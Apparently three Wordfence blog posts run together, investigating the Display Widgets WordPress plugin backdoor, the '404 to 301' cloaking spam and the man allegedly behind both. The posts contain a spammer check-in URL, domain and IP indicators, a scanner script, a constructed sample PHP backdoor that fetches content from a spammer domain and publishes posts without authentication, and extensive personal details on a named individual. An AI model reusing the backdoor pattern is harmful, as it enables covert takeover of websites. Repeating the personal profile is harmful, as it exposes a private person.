Categories
Security

The Man Behind Plugin Spam: Mason Soiza

This is a follow-up to our story titled “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites”. In this post, we explore who is behind the purchase and corruption of the Display Widgets plugin and at least two other popular WordPress plugins.

As part of my research into the sale of the Display Widgets plugin and the subsequent spam that appeared in it, I had reached out to Stephanie Wells, the original author of Display Widgets who sold it. Stephanie got back to me moments after I hit the publish button on our post.

We had a chat on Skype and she was incredibly concerned, helpful and forthcoming with data to try and clear up what exactly happened here. Steph has kindly agreed to let me share the details of their transaction with the WordPress community.

I was really excited because this allowed us to follow the money in our investigation into who is behind the spam in Display Widgets. Little did I know that this would lead to two other plugins and shed light on a story we wrote about last year.

Following The Money

Steph confirmed that they had sold the Display Widgets plugin to “Mason Soiza” for $15,000. He had approached them via their web contact form. This is the original email they received, complete with spelling errors:

–Begin email–

We would like to purchase this plugin from you and take complete owner ship of it and take away the stress from you.

We are trying to build one of the largest wordpress plugin companies and in doing this we are trying to purchase some rather large plugins like yours.

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

We have over 34 Plugins that we now own and manage.

–End email–

During their negotiations they received a further email from Soiza on April 24th which read:

–Begin email–

We have 1 plugin per account as WordPress do not really like the fact that people sell or buy the plugins so this protects us as the buyer from one of the previous owners from “snitching” and then crashing all our other plugins.

I can name drop a few however:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.
https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

We have many others but these are most recent.

To be brutally honest,

It helps with our web business that is pretty big in the casino industry, when we can use as a sales tactic “Our code is used on over 30million websites” world wide etc etc. Sounds silly but it goes along way in our industry, especially as we need to evident our statements by law.

–End email–

Notice the “404 to 301” plugin in that list (it was highlighted in red in the original post). We’ll come back to that.

The plugin was no longer a core part of Steph and her husband’s business, so they decided to sell it.

The PayPal transaction from May 19th, 2017 to purchase Display Widgets reads: Mason Soiza (pp@linkrocket.net) made a $15,000.00 USD payment.

The contract that Steph received is signed by Mason Soiza.

On June 21st, the first release of Display Widgets under the new author went out. Then on June 30th there was a second release, version 2.6.1, which included the malicious code we covered in part 1 of this series of posts. To remind you, this code allowed the new plugin author – Soiza, in this case – to publish spam content on any site running Display Widgets. There were approximately 200,000 sites using Display Widgets at the time.

The Trac ticket that Calvin Ngan opened 7 weeks ago, which was the first report of the malicious code and activity in Display Widgets, reported Payday Loan spam. This is an important fact, as you’ll see below.

Who Is Mason Soiza?

The contract that Stephanie received is signed by Mason Soiza. The company name used on the contract is:

Soiza Limited of Jubilee Cottage, Nottingham, England, NG122LD.

Companies House in the UK shows Soiza Limited as:

The address is a complete match to the address and company name provided on the invoice. The company has one corporate officer, Mason Reece Soiza, born March 1994 (age 23), a British citizen, appointed to the board on December 6th, 2016. His occupation is listed as Computer Programmer.

The email that Soiza used in the transaction is pp@linkrocket.net. If we visit the site linkrocket.net, it doesn’t provide much other than a logo. However, if we look at an archived version of it from May 2014, three emails appear on the home page, and we get Mason Soiza’s real email address, which is mason@linkrocket.net.

Using the people-search engine Pipl, we searched for mason@linkrocket.net and found a long list of social profiles.

Included is a LinkedIn profile for Mason Soiza in Nottingham. The profile pic has now been removed from his LinkedIn profile page but this is a screen capture.

Soiza’s LinkedIn profile lists him as CEO of “Payday Loans Now” since 2014.

If we visit www.paydayloansnow.co.uk, we discover at the top left of the page the following:

The footer of the page looks like this:

The pertinent data in this footer is:

  • Paydayloansnow.co.uk is confirmed to belong to Soiza Internet Marketers Limited (SIML).
  • SIML is an “introducer appointed representative” of Quint Group Limited.
  • SIML is entered on the Financial Services Register in the UK under reference number 748266.
  • Quint Group Limited is entered on the Financial Services Register under reference number 669450.
  • SIML’s company number is 09861376.

Let’s go to the Financial Services Register and look up SIML’s reference number. We find it listed as follows:

The FCA register entry lists the email address mason@inkrocket.net. This is probably a typo: the domain inkrocket.net does not exist, and the intended domain is almost certainly linkrocket.net.

Who Does Soiza Represent?

Based on data from the UK’s Financial Conduct Authority, “Soiza Internet Marketers Limited” is authorized to introduce clients to Quint Group Limited. Quint provides the financial services that Soiza is selling.

Soiza also operates www.unsecuredloans4u.co.uk, which likewise resells Quint’s financial products.

I phoned Quint in the UK and was escalated to their compliance director, Graham McGifford, who was very responsive. He told me that Quint does have standards they require their representatives to adhere to and they will take action if needed.

Quint confirmed that Mason Soiza is an authorized representative, or ‘introducer,’ as the FCA’s website calls it.

Graham requested that I send him more information so that they can look into the matter. We will be forwarding this blog post.

Linking Mason Soiza to the 404 to 301 Plugin Spam

You will recall that in Soiza’s own email to Steph (above) which he sent in April of this year while negotiating the purchase of the Display Widgets plugin, he mentioned that he bought the 404 to 301 plugin:

https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

In August of 2016, we wrote a story titled “404 to 301 Plugin Considered Harmful”. This was a controversial piece and we posted a follow-up titled “We will always put our customers and community first”.

In the follow-up, we mention that the spam from the 404 to 301 plugin was appearing on school websites in the UK; in particular, a UK-based “escort” service called cityofescorts.co.uk had appeared on a school website. This is the code that was fetching the spam content for the 404 to 301 plugin:

And this is an obfuscated screenshot we included in our August 2016 post:

If you do a whois lookup on cityofescorts.co.uk, you discover that the registrant is Mason Soiza.

The wpcdn.io server that was being used to serve spam to the “404 to 301” plugin is still up and running today. And if you visit the URL at wpcdn.io that was being used to serve up spam today, it serves up paydayloansnow.co.uk, which we have shown is another Soiza website.

Soiza says he bought 404 to 301. I reached out to the original plugin author, Joel James, to see if that is true. I haven’t been able to contact him.

Back in August of last year, Joel James wrote on this blog:

Did Joel James give Soiza commit access to his code? I would really like to hear more about what exactly happened. Soiza is now saying he purchased the plugin, but we don’t know if that was before or after the 404 to 301 debacle unfolded. Joel if you could comment here to help us understand the timeline, that would be really helpful.

What About the Other Plugins Soiza Bought?

In his email to Steph, Soiza mentions two other plugins. The notes to the right of each arrow are his:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.

I have not been able to connect with the author of ‘WP Slimstat’.

I did manage to connect with Ciprian Popescu, author of the “Finance Calculator” plugin that Soiza says he purchased, and Ciprian was kind enough to share the details with me.

Soiza contacted Ciprian early this year and used an alias of “Kevin Danna”. He expressed interest in buying Finance Calculator.

Soiza then purchased Finance Calculator for $600. During his communication with Ciprian, Mason Soiza appeared to make an error and he accidentally signed one of his emails from the Kevin Danna alias as ‘Mason’. Ciprian shared a screenshot with me:

Soiza also appears to use the Kevin Danna alias on WordPress forums.

Ciprian told me that for some reason, Soiza never updated the plugin after he purchased it. After learning about what happened with Display Widgets, he has taken back control of the Finance Calculator plugin, revoked Soiza’s access and confirmed that it is malware free. I received this message from him:

Hi Mark,

I can confirm that my plugin has not been tampered with. I have pushed an update to remove the ‘financecalculator’ committer, which was Mason Soiza. I am in the process of updating more stuff, such as rewriting some code for a smaller footprint; but the plugin is fully functional and malware-free.

My Communication With Soiza

We now have hard evidence, courtesy of Ciprian, that Soiza uses the “Kevin Danna” email address to communicate with people. We also know that the new owner of Display Widgets plugin was using that address on WordPress forums.

I communicated with “Kevin Danna” via email while researching our previous post. I asked about the “34 plugins” mentioned on the wpdevs.co.uk website that they owned. I also wanted to know if the malicious code in Display Widgets was there intentionally. This is the reply I received from “Kevin”. I published this in our previous post and left out the first few paragraphs. I’m including them this time to give you a sense of who this person is.

Hi Mark,

Just seen this email WOW!

My side of the story is, as you may/may not know. I got diagnosed with Lung Cancer a few months ago, so only have a few months/maybe a year left on this earth. So i sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign a NDA. Probably due to the reasons you have highlighted. This is the only plugin i sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they was using it to advertise there toolbar, which i suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites” adding words like that etc inflated the price of the business by xyz and then i would simply flip it as quick as i could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience i have caused in directly. I wish you the best of luck!.

Thanks

Kevin D

We know that Soiza bought the Display Widgets plugin from Steph and bought Ciprian’s Financial Calculator plugin. We know that Soiza communicates using the Kevin Danna email address. We also know that Mason Soiza owns the domains used for spamming in the “404 to 301” plugin. We also know that Steph sold her plugin for $15,000 to Mason Soiza; the above email, in which “Kevin” says he bought the plugin for $15,000, was actually the first time I had heard that figure, and Steph’s PayPal record later confirmed it. We also know that the wpdevs.co.uk website was only registered in April, so it’s not an old business from the “peak” of someone’s career.

So I’m going to go out on a limb here and say that Kevin Danna is actually Mason Soiza and based on Soiza’s public Facebook Profile, he is looking quite healthy.

Other Interests

According to a Whoisology search using Soiza’s email address, he owns the following domains:

  • onlineblackjackexpert.net (Active blackjack site)
  • 0xd0d78w2.info (Listed with Google as serving up malware. See below)

Before Google blocked it, the 0xd0d78w2.info domain was serving up a site that claimed your computer was infected and tried to get you to call a “Microsoft” support line. It looked like this (courtesy of Archive.org):

Business Is Good

Soiza appears to live the high life. On his public Facebook profile, he posts that he attended the Monaco Grand Prix in May of this year.

In April he was at Dead Rabbit in New York ($16 a cocktail).

Last year someone with the name “Mason Reece Soiza” posted a photo of their 2012 Ferrari 458 Italia on rate-drive-co.uk. The thread was discussing an “idiot driver” driving a red Ferrari 458 Italia 2012 model. The license plate is “MA52 SON”.

Business appears to be booming for Soiza.

Wrapping It Up

Our team has assembled a lot of data on Mason Soiza from public sources. He has interests in a wide range of online businesses that include payday loans, gambling and ‘escort’ services, among others.

He has been active on black hat forums and has been banned from “Black Hat World” (username LinkRocket) and from WickedFire.com (username MasonSoiza). Soiza is active on Reddit as IIRR and moderates a subreddit called /r/paydayloansnowcouk.

At this point we have confirmed that Soiza purchased the Financial Calculator plugin and the Display Widgets plugin and we have established a financial trail. He added a backdoor to the Display Widgets WordPress plugin to allow himself unlimited publishing access to sites running the plugin.

We also know that Soiza was involved in the spam that originated from the “404 to 301” plugin which he says he bought, although in that case the author has not yet confirmed the sale of the plugin. His escort website and payday loans websites were spammed from the “404 to 301” plugin.

If you are contacted by “Kevin Danna” or “Mason Soiza” and are a plugin author, we advise you to avoid all contact.

As always I welcome your feedback in the comments.

Thanks and Credits

A big thanks to Steph Wells, original author of the Display Widgets plugin who provided the initial financial data we needed to follow the money. Also a huge thanks to Ciprian Popescu, author of the Financial Calculator plugin, who also shared transaction data with me and a screenshot that confirmed Soiza uses the Kevin Danna alias. Both plugin authors worked with me on very short notice, so thank you!!

Also a huge thanks to our team who dropped everything and worked to rapidly build up a profile of Soiza. I’ve mentioned their names on the blog before, but just about everyone pitched in on this post, so you can hit our About page to see who they are. Special thanks to Matt Barry who recognized the connection between Soiza and the “404 to 301” plugin during our research.

The post The Man Behind Plugin Spam: Mason Soiza appeared first on Wordfence.


Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites

If you have a plugin called “Display Widgets” on your WordPress website, remove it immediately. The last three releases of the plugin have contained code that allows the author to publish any content on your site. It is a backdoor.

The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed from the WordPress.org plugin repository four times and readmitted three times. The plugin is used by approximately 200,000 WordPress websites, according to the WordPress.org repository (see below).

Wordfence warns you if you are using a plugin that has been removed from the repository. During the past months you would have been warned several times that this plugin has been removed with a ‘critical’ level warning that looks like this:

It turns out that this plugin did have “unknown security issues”. Let’s start with a timeline of what happened to Display Widgets, why it was removed three times from the repository and allowed back in each time and then finally removed again a fourth time a few days ago.

A Timeline of “Display Widgets” Bad Behavior

On June 21st a user known as ‘displaywidget’ on the WordPress.org forums, to whom the original owner had sold the Display Widgets plugin, released version 2.6.0 of the plugin.

On June 22nd, David Law, a UK based SEO consultant sent an email to the WordPress.org plugin team letting them know that the Display Widgets plugin was installing additional code from an external server. The plugin was downloading a large Maxmind IP geolocation database of around 38 megabytes from the author’s own server. This is not allowed for WordPress plugins in the repository.

On June 23rd, the plugin team removed Display Widgets from the repository. There was some discussion about this on the WordPress.org forums.

Then on June 30th, 7 days later, the developer released version 2.6.1 of the plugin. This release contained a file called geolocation.php which, no one realized at the time, contained malicious code. 

The code in geolocation.php allowed the plugin author to post new content to any website running the plugin, to a URL of their choosing. They could also update content and remove content. Furthermore, the malicious code prevented any logged-in user from seeing the content. In other words, site owners would not see the malicious content.

David Law again contacted the plugin team and let them know that the plugin was logging visits to each website to an external server, which has privacy implications.

On July 1st the plugin was once again removed from the WordPress repository.

On July 6th version 2.6.2 of Display Widgets was released, and it again included the malicious code referenced above, which had still gone unnoticed by anyone. This release changed the logging code so that logging was disabled by default and could be switched on or off with an option. At the time David Law let the WordPress.org plugin team know that this was not enough in his opinion, and they ended up disagreeing on the issue.

On July 23rd, Calvin Ngan opened a Trac ticket reporting that Display Widgets was injecting spammy content into his website. He included a link to Google results that had indexed the spam and said the malicious code is in geolocation.php.

On the 24th of July the WordPress.org plugin team removed Display Widgets from the plugin repository for a third time.

On the 2nd of September version 2.6.3 of the plugin was released and it included the same malicious code. Line 117 of geolocation.php in version 2.6.3 even contains a minor bug fix to the malicious code, which makes it clear that the authors themselves are maintaining the malicious code and understand its operation.

On September 7th a user reported on the Display Widgets plugin support forum on WordPress.org that spam had been injected into their website.

The author responds on September 8th saying:

“thank you for letting me know. Yes, the last update fixed this you need to clear your cache and update to the latest version. As I mentioned in the changelog, I asked a friend of mine to review the code and he gave me a full report. You can look at the wp_options table for leftovers, and if you don’t find anything then you should be okay.”

And then another reply from someone else sharing the same ‘displaywidget’ user account (spelling mistakes included):

Hi,

The other admin here. Unfortunately the addition of the GEO Location made the software vulnerable to a exploit if used in conjunction with other popular plugins.

The latest update fixed and sanitised the vulnerability. A simple empty of the cache & clearing of the wp_options table (if affected) should remove that post.

Again i apologise. But this should fix it. We estimate only around 100 or so sites to be comprimised.

Thanks

DW

The malicious code is not an exploit. It is a backdoor giving the author access to publish content on websites using the plugin. It does not require ‘other popular plugins’ to work.

The second poster says “only around 100 or so sites” are compromised. Actually, the backdoor exists on any site running versions 2.6.1 to version 2.6.3 of the plugin. Considering the time-span of 2.5 months between those releases, that would mean that these two or more people have access to publish anything they like on most of the 200,000 sites the plugin is installed on.

On September 8th the plugin was removed for a fourth time from the WordPress plugin repository. This time we hope it is permanent.

Wordfence Issued ‘Critical’ Alert Each Time Plugin Was Removed

On June 15th of this year, Wordfence added a feature to alert you if a plugin is removed from the repository. We did this because in the past, plugins have been removed because they have a security issue. It turns out that this feature helped users recognize that there was a security issue with this plugin.

We started alerting when this plugin was first removed, over two months ago:


We then continued to alert as the plugin was removed from the repository and re-added several times, as is the case in this forum post:

I’m incredibly proud that our team took the initiative and got this feature released in June of this year, just in time to save many of our free and paid customers from being affected by this malicious plugin.

Could This Have Been Accidental?

It is worth considering that the plugin author may have accidentally included an external library that contained someone else’s malicious code without realizing it. In fact the second poster on September 8th says:

“Unfortunately the addition of the GEO Location made the software vulnerable to a exploit if used in conjunction with other popular plugins.”

This suggests they used an external library and weren’t aware of the ‘vulnerability’.

They were maintaining the malicious code

The 2.6.3 release of their plugin makes a minor modification to the malicious code in geolocation.php to fix a bug in the code that lets the plugin author list the malicious posts they have published on your site.

Then in the latest release there is a major change. They break out the code that is pulling down the spam into a separate function called endpoint_request() and switch to using the domain stopspam.io instead of using geoip2.io. Both domains are hosted on the same IP address. They also base64 encode the domain name in an attempt to hide the name of the domain they are fetching spam from.

The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from.

The authors operate the domain the spam is fetched from

On July 4th, one of the plugin authors says this in a post:

So I registered address geoip2.io to provide service for “unlimited” requests. I purchased ip2location Pachage for a project of mine a while ago, so I can use with no problem, as long as I do not sell similar service to ip2location.

The authors admit they registered and own the geoip2.io domain name. The stopspam.io domain which they later switch to is hosted at the same IP address which is 52.173.202.113.

The authors were caught lying

The original authors of Display Widgets sold the plugin to its new owners and have said so on their website.

On approximately July 4th, one of the authors sharing the ‘displaywidget’ account posted that they did not buy the plugin, calling it “fake news”:

“out of curiosity, where does it say that I purchased this plugin? See? This is exactly why people like Trump win: because of fake information being spread, and because of people who believe in anything they read without checking the reliability of those sources. I’d like to know where this rumor that “money was exchanged” started.”

The former authors at Strategy11 have a clear message on their site saying that the plugin was ‘purchased’:

Why would the new owners of the plugin lie about the plugin being purchased? Who knows, but it provides data showing that they are willing to lie publicly while accusing others of doing the same.

Who is Behind Display Widgets and the ‘displaywidget’ Username?

In the heat of an argument on the WordPress forums, one of the authors sharing the ‘displaywidget’ username includes the following in a post:

Please keep your own un-educated thoughts to your self and stop trying to advertise your FORK of the real plugin on my support pages. Instead please contact kevin.danna@wpdevs.co.uk and please provide who ever you contact, with that email address.

They sign the post “Kevin”.

If you visit the ‘wpdevs.co.uk’ domain name you’ll find a site that wants to buy WordPress plugins:

They claim to have “34 plugins and counting”. This suggests that whoever bought the Display Widgets plugin is operating this business. There is no further info about “Kevin Danna” or the business available.

Which 34 plugins does this company own?

This company and the individuals behind it appear to be responsible for injecting malicious code into a plugin used by over 200,000 websites. If they have 33 other plugins, we would like to know which they are. I reached out to the kevin.danna@wpdevs.co.uk email address and received a reply which I have included below. The reply suggests that the “34 plugins” claim may not be true.

Are they really based in the UK? 

The company says that they are based in the UK on their home page. Their domain is also a UK domain name. And yet, one of the plugin authors said in a post on July 4th:

Apologies for the delay. Please consider that it is Independence Day weekend here in the United States, and even plugin developers deserve to spend some quality time with their families, don’t you think?

Is this another example of one of the authors lying? Or is one of them based in the United States and the company is based in the UK?

A possible Russian linguistic connection

I’m moving into the realm of speculation here, but something struck me as I was reading some of the plugin authors comments. These are extracts from the forum posts from the account that the two authors share. You can find all posts here.

Notice the following phrases, which I’ve extracted from posts by ‘displaywidget’. Everything in square brackets has been added by me and marks a linguistic error by the poster.

  • “so I can use [it] with no problem”
  • “as long as I do not sell [a] similar service to ip2location”
  • “have access to [the] IP addresses of those using [the] service”
  • “Why do I collect also [the] website URL?”
  • “websites are abusing of this free service”
  • “people think I [am] try[ing] to take advantage of something”

This indicates that at least one of the individuals sharing the ‘displaywidget’ account is a non-native English speaker. Russian has no articles, and omitting the article when speaking English is a common mistake for Russian speakers. That is the most common mistake in the examples above.

This may indicate that at least one of the authors is either based in eastern Europe or of eastern European origin.

Kevin Replies to My Email

I sent the kevin.danna@wpdevs.co.uk email address a request for comment on this story. I asked specifically about the wpdevs website claiming that he has 34 plugins and whether the code to add spam content was included intentionally. I received a reply. I am excluding the first four sentences, which include some personal detail. This is the rest of his reply:

—Begin quoted email—

*snip*… So i sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign a NDA. Probably due to the reasons you have highlighted. This is the only plugin i sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they was using it to advertise there toolbar, which i suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites” adding words like that etc inflated the price of the business by xyz and then i would simply flip it as quick as i could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience i have caused in directly. I wish you the best of luck!.

—end quoted email—

I sent Kevin a follow-up request for more information. I pointed out that the wpdevs.co.uk domain was registered in April of this year according to Nominet. I also pointed out that archive.org has no record of anything on the domain prior to that.

I’ll leave it up to the reader to draw your own conclusions.

The Technical Functioning of Malicious Code in DisplayWidgets

The most recent version of the plugin hooks into the ‘wp’ action which runs on each request to the WordPress front-end. When this hook is first run after the plugin’s activation, it makes a request to the spammer’s server to “check in” with the following parameters:

http://stopspam[dot]io/api/update/?url=&agent=&v=1&p=4&ip=&siteurl=

If we break that into bullets for readability it is:

  • url=
  • agent=
  • v=1
  • p=4
  • ip=
  • siteurl=

This “check in” call acts to notify the spammer that a new site or installation can be configured to host backlinks or other spam content.

The plugin has separate actions that allow an unauthenticated user (the spammer in this case) to create or update posts/pages at a user-supplied slug with content that is pulled down from the stopspam.io domain.

The content pulled down from the spammer’s domain includes script tags that could be used for an XSS attack. The attack could not target logged-in users of the site, because the content is hidden from them; it could, however, target visitors who are not logged in and steal their sensitive data via XSS.

The following URLs can be accessed by the spammers (plugin authors in this case) to create, modify and delete content on a website running the affected versions of this plugin:

As you can see, the authors have even included a convenient ‘bulk’ deletion function to remove all traces.

The spammers were previously using the geoip2.io domain to fetch spam. They later switched to stopspam.io and neatened up their code slightly. The spammers have several domains they are using, all hosted at the same IP address 52.173.202.113:

  • stopspam.io registered 2 July 2017.
  • geoip2.io registered 24 July 2017.
  • w-p.io registered 11 July 2017.
  • maxmind.io registered 24 July 2017.
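A defender-side scanner for the behaviour described above, added here as an example (it is not Wordfence’s tooling and not the plugin’s code). It flags PHP source that hooks the ‘wp’ action, fetches remote content and writes posts without any capability check, and it matches the domains, IP address and check-in path quoted in this post; the sample plugin source inside it is constructed to mimic the described behaviour, not the real Display Widgets code.

```python
"""Scan WordPress plugin PHP source for the check-in / remote-content pattern
described in the post. Added example, not Wordfence's or the plugin's code."""
import re
from pathlib import Path

# Indicators quoted in the post: spammer domains, shared IP and check-in path.
IOC_PATTERNS = [
    r"stopspam\.io", r"geoip2\.io", r"w-p\.io", r"maxmind\.io",
    r"52\.173\.202\.113", r"/api/update/",
]

# The behavioural triad: hook every front-end request, fetch remote content,
# and create/update/delete posts from it.
BEHAVIOUR_PATTERNS = {
    "hooks_wp_action": r"add_action\(\s*['\"]wp['\"]",
    "remote_fetch": r"\b(wp_remote_get|wp_remote_post|file_get_contents|curl_exec)\s*\(",
    "writes_posts": r"\b(wp_insert_post|wp_update_post|wp_delete_post)\s*\(",
}
# Any of these suggests the write path is gated on an authenticated user.
CAPABILITY_CHECK = r"\b(current_user_can|check_admin_referer|wp_verify_nonce)\s*\("

def scan_source(src: str) -> dict:
    """Return matched indicators and behaviours for one PHP source string."""
    iocs = sorted({m for p in IOC_PATTERNS for m in re.findall(p, src)})
    behaviours = {name: bool(re.search(p, src)) for name, p in BEHAVIOUR_PATTERNS.items()}
    unauth_write = behaviours["writes_posts"] and not re.search(CAPABILITY_CHECK, src)
    suspicious = bool(iocs) or (all(behaviours.values()) and unauth_write)
    return {"iocs": iocs, "behaviours": behaviours,
            "unauthenticated_write": unauth_write, "suspicious": suspicious}

def scan_plugin_dir(plugin_dir: Path) -> dict:
    """Scan every .php file under a plugin directory, keyed by relative path."""
    return {str(f.relative_to(plugin_dir)): scan_source(f.read_text(errors="replace"))
            for f in plugin_dir.rglob("*.php")}

# Constructed sample mimicking the described behaviour (not the real plugin).
SAMPLE_PLUGIN = r"""<?php
add_action('wp', 'dw_check_in');
function dw_check_in() {
    wp_remote_get('http://stopspam.io/api/update/?url=' . home_url());
}
add_action('wp', 'dw_remote_post');
function dw_remote_post() {
    if (!empty($_GET['slug'])) {
        $body = wp_remote_retrieve_body(wp_remote_get('http://stopspam.io/c/' . $_GET['slug']));
        wp_insert_post(['post_name' => $_GET['slug'], 'post_content' => $body, 'post_status' => 'publish']);
    }
}
"""

if __name__ == "__main__":
    print(scan_source(SAMPLE_PLUGIN))
```

Run `scan_plugin_dir(Path("wp-content/plugins/some-plugin"))` against a real install to get one result per PHP file; a hit on `iocs` is a hard indicator, while the behavioural triad without a capability check is a prompt for manual review.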

Wrapping It Up

As I mentioned in the introduction, Wordfence would have warned you each time this plugin was removed from the repository. It is important that you have Wordfence installed and have your email alerts configured. Make sure you pay attention and respond when needed. We have several reports from users who say they did respond to this Wordfence alert and removed the malicious plugin.

You are welcome to share your thoughts in the comments. Please note that many of the forum moderators and plugin repository maintainers are volunteers. Please do not judge them harshly – in general they do a pretty darn good job of keeping an extremely large repository and support forum system running smoothly for the most popular CMS on earth.

I would also ask you to not start any witch hunts. I’m sure some folks are angry about what transpired here, but things happen and if you were on top of security, you would have been notified that the plugin was removed from the repository and you would have removed it from your site. Occasionally plugins change ownership and very rarely, that doesn’t go well. That appears to be what happened in this case.

Mark Maunder – Wordfence Founder/CEO.

Credits

A number of people contributed to this post. Firstly I’d like to thank David Law. He was the first person to raise a concern about this plugin and pursued his case relentlessly on the WP forums with, at times, resistance from the plugin authors and others. Thanks David for looking out for the rest of us. David was also kind enough to exchange several lengthy emails with me to help establish a timeline – one of them was at 5am his time.

I’d also like to thank Matt Barry, Brad Haas, Kathy Zant, James Yokobosky, Dan Moen, Asa Rosenberg and Matt Rusnak on our team, for their assistance with this post.

I also tried to contact Stephanie Wells, the original author of the plugin via her website and via LinkedIn and she was not immediately available for comment.

UPDATE: I just completed a Skype call with Stephanie, the original author of the plugin. She has been incredibly open and honest about this whole situation. They (she runs a business with her husband) are good people and she freely shared data with me that will help tremendously with our investigation. Stephanie clearly cares deeply for the WordPress community and security in general. I can tell she is deeply disappointed by how this worked out and wants to do everything she can to help. My team and I are still processing the data she shared, but will most likely post a follow-up.

The post Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites appeared first on Wordfence.


404 to 301 Plugin Considered Harmful

Yesterday we received a site cleaning request where one of our customers was seeing spammy links, Payday Loans in this case, injected into their WordPress website page content. The links were only appearing when the site was visited by a search engine crawler. This is common when a site has been hacked.

An extract from the customer communication with personal info removed:

We look after a clients website [website removed] and believe that has been compromised.

Specifically, the issue is that when google or bing’s search bots crawl the site, they see some text injected into the top of the homepage. I have been using a user agent switcher to verify its presence but it was first spotted when we did a pagespeed test here: [removed] and it showed in their ‘preview’ screengrab on the desktop view.

This text isn’t always present and when it is there it’s only on the home URL (not actually the page eg. if you visit [page removed] it doesn’t appear).

[snip]

For reference, the block of injected text appears under the site header (navigation etc.) and also in the body of our exit-intent popup:

Make Ends Meet With Payday Loans

It is often very easy to face any financial emergency if you have adequate money to pay for them. But, this can seem all too impossible if you often live from one paycheck to another. How will you be able to pay for your urgent financial emergencies? Most often than not, you can’t. Face the reality, when your job is unable to pay for your financial emergencies, it is best to turn to payday loan providers out there.

[rest of content removed including link to payday loans site]

It turns out that this is not a hacked site. It is content that is injected by a plugin called 404 to 301, which has 70,000 active installs and has a 4.5 star review from 56 reviewers. When you install the plugin it asks you to agree to a long agreement which includes parts of the GNU General Public License. But at the end it also includes the following text (you have to scroll down to find it):


Third Party Text Links

Third party text networks supply text for display in 404 to 301. These networks may collect your visitors’ IP addresses, in native or hashed forms, for purposes of controlling the distribution of text links. 404 to 301 collects anonymous aggregated usage statistics.

By clicking the button here below, you agree to the terms and conditions and give permission to place text links on your website when search engine crawlers access it. Your website’s layout, performance and interaction with human visitors should not be altered or affected in any way. Please note that this feature can be deactivated at any time under 404 to 301 Setting > Help & Info > Plugin Information > Disable UAN, without affecting any other feature available in 404 to 301.

404 to 301 – Copyright © 2016.

I’m reasonably sure that no sane webmaster would agree to:

  1. Cloaking, which is specifically banned by Google and will result in a search engine penalty.
  2. Allowing ads to be inserted into their site over which they have no editorial control, including payday loan ads.
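The check the customer above did by hand (compare the page as a browser sees it with the page as a crawler sees it) can be automated; the following is an added example, not Wordfence’s code, and the two HTML documents in it are constructed samples. It reports text blocks that only appear in the crawler view, which is exactly the cloaking signature described in this post.

```python
"""Report text a search-engine crawler sees that a normal visitor does not.
Added example, not Wordfence's code; sample HTML below is constructed."""
import urllib.request
from html.parser import HTMLParser

# Real Googlebot User-Agent string, used only to request the crawler view.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/52.0 Safari/537.36"

class _TextBlocks(HTMLParser):
    """Collect visible text blocks, skipping script/style content."""
    SKIP = {"script", "style"}
    def __init__(self):
        super().__init__()
        self.blocks, self._skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1
    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1
    def handle_data(self, data):
        text = " ".join(data.split())
        if text and not self._skip:
            self.blocks.append(text)

def text_blocks(html: str) -> list:
    p = _TextBlocks()
    p.feed(html)
    return p.blocks

def cloaked_blocks(browser_html: str, crawler_html: str) -> list:
    """Text blocks present in the crawler view but absent from the browser view."""
    seen = set(text_blocks(browser_html))
    return [b for b in text_blocks(crawler_html) if b not in seen]

def fetch_as(url: str, user_agent: str) -> str:
    """Fetch a URL with a chosen User-Agent (network access required)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode(resp.headers.get_content_charset() or "utf-8", "replace")

# Constructed samples: the same page as served to a browser and to a crawler.
BROWSER_VIEW = "<html><body><header>Acme Co</header><p>Welcome to Acme.</p></body></html>"
CRAWLER_VIEW = ("<html><body><header>Acme Co</header>"
                "<div><h2>Make Ends Meet With Payday Loans</h2>"
                "<p>Face the reality and turn to <a href='http://example.invalid'>payday loan providers</a></p></div>"
                "<p>Welcome to Acme.</p></body></html>")

if __name__ == "__main__":
    for block in cloaked_blocks(BROWSER_VIEW, CRAWLER_VIEW):
        print("crawler-only:", block)
```

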